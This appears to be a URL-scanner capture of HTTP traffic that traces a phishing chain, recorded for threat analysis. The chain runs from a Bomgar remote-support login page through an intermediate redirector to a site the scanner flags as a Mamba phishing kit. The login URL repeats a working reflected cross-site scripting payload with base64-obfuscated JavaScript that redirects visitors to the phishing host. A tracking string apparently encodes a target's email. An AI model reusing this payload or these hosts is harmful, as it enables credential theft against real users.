GET remotesupport.level8tech.net/appliance/content/appliance.js
50.199.20.75 200 OK 750 B URL GET remotesupport.level8tech.net/appliance/content/appliance.js
IP 50.199.20.75:443
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate Issuer Let's Encrypt
Subject remotesupport.level8tech.net
Fingerprint 24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
Validity Wed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
Hash 014e8fa1aeb747000950054d575c7955
5bba82fc873385d5bc4cd8ef5b1c14680a17cc64
f9b95619a60b979771a901aeb43632dbc744bd2fea8c3fecd772a9589988d15e
GET /appliance/content/appliance.js HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:18:30 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000
Vary: X-Requested-With,Accept-Encoding
Last-Modified: Tue, 23 Feb 2021 23:11:09 GMT
ETag: "2ee-5bc0908a03d40-gzip"
Accept-Ranges: bytes
Content-Encoding: gzip
X-UA-Compatible: IE=edge
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 438
Content-Type: application/javascript
GET remotesupport.level8tech.net/appliance/content/bomgar177.jpg
0.0.0.0 0 B URL GET remotesupport.level8tech.net/appliance/content/bomgar177.jpg
IP 0.0.0.0:0
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate Issuer Let's Encrypt
Subject remotesupport.level8tech.net
Fingerprint 24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
Validity Wed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
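Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
(These three values are the MD5, SHA-1 and SHA-256 of empty input: no response body was captured for this request (0 B), so they do not identify any content.)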
GET /appliance/content/bomgar177.jpg HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
GET accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
0.0.0.0 0 B URL User Request GET accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
IP 0.0.0.0:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
NIDS Severity Alert suricata low ET HUNTING [TW] Likely Javascript-Obfuscator Usage Observed M2
suricata low ET HUNTING [TW] Likely Javascript-Obfuscator Usage Observed M3
GET /qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20= HTTP/1.1
Host: accounting-portal.bchsaa.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
GET taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
162.241.27.245 200 OK 2.9 kB URL User Request GET taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
IP 162.241.27.245:443
ASN #46606 UNIFIEDLAYER-AS-1
Certificate Issuer Let's Encrypt
Subject *.taxexpertscan.com
Fingerprint 95:55:5D:00:2A:0A:9B:19:DC:68:BA:3D:33:E0:C4:54:8D:1E:35:64
Validity Mon, 31 Mar 2025 09:35:35 GMT - Sun, 29 Jun 2025 09:35:34 GMT
File type HTML document, ASCII text, with very long lines (2606)
Hash 8465cecd5bc2324d9f842c2b21b7fdf4
a166f57cc184756953a253d5d4c7ff2bc6abae2a
127a21653010daf5d532892ffa127eaab1f895eaf99f51b8af84a4df270cc270
Analyzer Verdict Alert urlquery suspicious Suspicious - Anti-debugging code
urlquery phishing Phishing - Mamba Phishing Kit
GET /s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20= HTTP/1.1
Host: taxexpertscan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://accounting-portal.bchsaa.org/
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 200 OK
cache-control: no-store
set-cookie: _cid=79a110db5e803c22ede226733ed72029; expires=Fri, 30 May 2025 16:19:36 GMT; Max-Age=60
vary: Accept-Encoding
content-encoding: gzip
content-length: 1666
content-type: text/html; charset=UTF-8
date: Fri, 30 May 2025 16:18:35 GMT
server: Apache
X-Firefox-Spdy: h2
GET taxexpertscan.com/files/images/Logo.png
162.241.27.245 200 OK 1.1 kB URL GET taxexpertscan.com/files/images/Logo.png
IP 162.241.27.245:443
ASN #46606 UNIFIEDLAYER-AS-1
Requested by https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Certificate Issuer Let's Encrypt
Subject *.taxexpertscan.com
Fingerprint 95:55:5D:00:2A:0A:9B:19:DC:68:BA:3D:33:E0:C4:54:8D:1E:35:64
Validity Mon, 31 Mar 2025 09:35:35 GMT - Sun, 29 Jun 2025 09:35:34 GMT
File type HTML document, ASCII text
Hash 622bb6a2c6ccd71fc0ad9eb990a303f3
ca504ab1f48937b94940735c646e03a7e3234977
683da311341984442913d7acb1362e3d6dfc8691f84db4d597cacf00118b8732
Analyzer Verdict Alert urlquery phishing Phishing - Mamba Phishing Kit
OpenPhish phishing Generic/Spear Phishing
GET /files/images/Logo.png HTTP/1.1
Host: taxexpertscan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
content-length: 567
content-type: text/html; charset=UTF-8
date: Fri, 30 May 2025 16:18:36 GMT
server: Apache
X-Firefox-Spdy: h2
142.250.74.78 404 Not Found 1.6 kB IP 142.250.74.78:443
Certificate Issuer Google Trust Services
Subject *.google.com
Fingerprint 7B:D2:02:FC:58:D9:E6:6C:DB:4E:0A:85:10:91:65:A5:9A:9C:5D:12
Validity Mon, 12 May 2025 08:42:58 GMT - Mon, 04 Aug 2025 08:42:57 GMT
File type HTML document, Unicode text, UTF-8 text, with very long lines (1136)
Hash bc0ad2db3272298238c3933ea0d944d1
ccb1767caf616c73513dc921cd3f5da072582a77
0a6ad5109827eff80f61f2106f29d9fb38ce486fa397551e506bf5b6ed861f36
GET /404/ HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://taxexpertscan.com/
DNT: 1
Connection: keep-alive
Cookie: SOCS=CAESHAgBEhJnd3NfMjAyMjA5MjktMF9SQzEaAnJvIAEaBgiAkvOZBg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 404 Not Found
content-type: text/html; charset=UTF-8
referrer-policy: no-referrer
content-length: 1565
date: Fri, 30 May 2025 16:18:38 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
GET remotesupport.level8tech.net/appliance/content/style.css
50.199.20.75 200 OK 8.9 kB URL GET remotesupport.level8tech.net/appliance/content/style.css
IP 50.199.20.75:443
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate Issuer Let's Encrypt
Subject remotesupport.level8tech.net
Fingerprint 24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
Validity Wed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
File type assembler source, ASCII text
Hash 5c9426c78554738a1d62fb81061a0054
1492debf3040ffd2dec27763b0aec3c720f7d2f5
3a738fc0e46affbce2f8ca2c3c6af85f813d8da3ecfafd8133f2082b07224fa4
GET /appliance/content/style.css HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:18:30 GMT
Server: Apache
Strict-Transport-Security: max-age=31536000
Vary: X-Requested-With,Accept-Encoding
Last-Modified: Tue, 23 Feb 2021 23:11:09 GMT
ETag: "22cb-5bc0908a03d40-gzip"
Accept-Ranges: bytes
Content-Encoding: gzip
X-UA-Compatible: IE=edge
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 2769
Content-Type: text/css
GET accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
45.61.161.154 200 OK 2.8 kB URL User Request GET accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
IP 45.61.161.154:80
ASN #206216 Advin Services LLC
File type JavaScript source, ASCII text, with very long lines (2223)
Hash d2c4021ccbe0ab9f44b8f6aa94a19e90
2cc0b4a67d33e60cb8aa7b4eef5bc2dda91fe243
cc855898df11622e20a2c45d07b06c88700b1043712af6d15de3d34edf06c4bb
NIDS Severity Alert suricata low ET HUNTING [TW] Likely Javascript-Obfuscator Usage Observed M2
suricata low ET HUNTING [TW] Likely Javascript-Obfuscator Usage Observed M3
GET /qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20= HTTP/1.1
Host: accounting-portal.bchsaa.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: gunicorn
Date: Fri, 30 May 2025 16:18:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2807
GET accounting-portal.bchsaa.org/favicon.ico
45.61.161.154 200 OK 0 B URL GET accounting-portal.bchsaa.org/favicon.ico
IP 45.61.161.154:80
ASN #206216 Advin Services LLC
Requested by http://accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /favicon.ico HTTP/1.1
Host: accounting-portal.bchsaa.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: gunicorn
Date: Fri, 30 May 2025 16:18:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 0
POST accounting-portal.bchsaa.org/araga3ad
45.61.161.154 200 OK 158 B URL POST accounting-portal.bchsaa.org/araga3ad
IP 45.61.161.154:80
ASN #206216 Advin Services LLC
Requested by http://accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Hash 5df1f50ef2808ae2af1e09bd6cc96885
8e5da83f889b2450875b9553abe7c4398dcfa7c9
23c44264e0475c391781fd7df73ede35fefd528a368132c52ec8b3cf9f534fb2
POST /araga3ad HTTP/1.1
Host: accounting-portal.bchsaa.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://accounting-portal.bchsaa.org/qv977H?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Content-Type: application/json
Content-Length: 424
Origin: http://accounting-portal.bchsaa.org
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: gunicorn
Date: Fri, 30 May 2025 16:18:35 GMT
Connection: close
Content-Type: application/json
Content-Length: 158
GET www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
142.250.178.100 200 OK 3.2 kB URL GET www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
IP 142.250.178.100:443
Certificate Issuer Google Trust Services
Subject www.google.com
Fingerprint 84:BD:0D:9A:51:CC:86:3E:E9:2F:6E:7C:2D:58:AC:4C:FB:B5:3D:8C
Validity Mon, 12 May 2025 08:44:44 GMT - Mon, 04 Aug 2025 08:44:43 GMT
File type PNG image data, 150 x 54, 8-bit/color RGBA, non-interlaced
Hash 9d73b3aa30bce9d8f166de5178ae4338
d0cbc46850d8ed54625a3b2b01a2c31f37977e75
dbef5e5530003b7233e944856c23d1437902a2d3568cdfd2beaf2166e9ca9139
GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: SOCS=CAESHAgBEhJnd3NfMjAyMjA5MjktMF9SQzEaAnJvIAEaBgiAkvOZBg
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 200 OK
accept-ranges: bytes
content-type: image/png
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="static-on-bigtable"
report-to: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
content-length: 3170
date: Fri, 30 May 2025 16:18:38 GMT
expires: Fri, 30 May 2025 16:18:38 GMT
cache-control: private, max-age=31536000
last-modified: Tue, 22 Oct 2019 18:30:00 GMT
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
GET remotesupport.level8tech.net/appliance/content/globe.png
0.0.0.0 0 B URL GET remotesupport.level8tech.net/appliance/content/globe.png
IP 0.0.0.0:0
Requested by https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Certificate Issuer Let's Encrypt
Subject remotesupport.level8tech.net
Fingerprint 24:67:E2:4F:FD:F5:DC:D6:73:20:36:A4:42:DA:38:2A:5D:06:08:DC
Validity Wed, 23 Apr 2025 06:03:35 GMT - Tue, 22 Jul 2025 06:03:34 GMT
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /appliance/content/globe.png HTTP/1.1
Host: remotesupport.level8tech.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://remotesupport.level8tech.net/appliance/login?login[password]=test%22/%3E%3Cscript%3Evar%20addt=%20%22?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=%22;eval(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LnN0eWxlLmRpc3BsYXkgPSAnbm9uZSc7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAgJ2h0dHA6Ly9hY2NvdW50aW5nLXBvcnRhbC5iY2hzYWEub3JnL3F2OTc3SCcrYWRkdDsg%27));%3C/script%3E%3E&login[use_curr]=1&login[submit]=Change%20Password
Cookie: nsbase_session=a19b9b466109f3c5cebbfd1cfd1ebca8; warnings=1614121869
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
GET taxexpertscan.com/favicon.ico
162.241.27.245 200 OK 1.1 kB URL GET taxexpertscan.com/favicon.ico
IP 162.241.27.245:443
ASN #46606 UNIFIEDLAYER-AS-1
Requested by https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Certificate Issuer Let's Encrypt
Subject *.taxexpertscan.com
Fingerprint 95:55:5D:00:2A:0A:9B:19:DC:68:BA:3D:33:E0:C4:54:8D:1E:35:64
Validity Mon, 31 Mar 2025 09:35:35 GMT - Sun, 29 Jun 2025 09:35:34 GMT
File type HTML document, ASCII text
Hash 622bb6a2c6ccd71fc0ad9eb990a303f3
ca504ab1f48937b94940735c646e03a7e3234977
683da311341984442913d7acb1362e3d6dfc8691f84db4d597cacf00118b8732
Analyzer Verdict Alert urlquery phishing Phishing - Mamba Phishing Kit
OpenPhish phishing Generic/Spear Phishing
GET /favicon.ico HTTP/1.1
Host: taxexpertscan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: https://taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
HTTP/2 200 OK
vary: Accept-Encoding
content-encoding: gzip
content-length: 567
content-type: text/html; charset=UTF-8
date: Fri, 30 May 2025 16:18:36 GMT
server: Apache
X-Firefox-Spdy: h2
POST taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
162.241.27.245 301 Moved Permanently 1.6 kB URL User Request POST taxexpertscan.com/s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20=
IP 162.241.27.245:443
ASN #46606 UNIFIEDLAYER-AS-1
Certificate Issuer Let's Encrypt
Subject *.taxexpertscan.com
Fingerprint 95:55:5D:00:2A:0A:9B:19:DC:68:BA:3D:33:E0:C4:54:8D:1E:35:64
Validity Mon, 31 Mar 2025 09:35:35 GMT - Sun, 29 Jun 2025 09:35:34 GMT
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Analyzer Verdict Alert urlquery suspicious Suspicious - Anti-debugging code
urlquery phishing Phishing - Mamba Phishing Kit
POST /s/?c3Y9bzM2NV8xX29uZSZtPXlHJnVpZD1VU0VSMjEwNTIwMjVVNTEwNTIxNDcmdD1PcA==N0123NbHNjaGVyZmVsQG1vbnN0ZXJzbWFzaC5jb20= HTTP/1.1
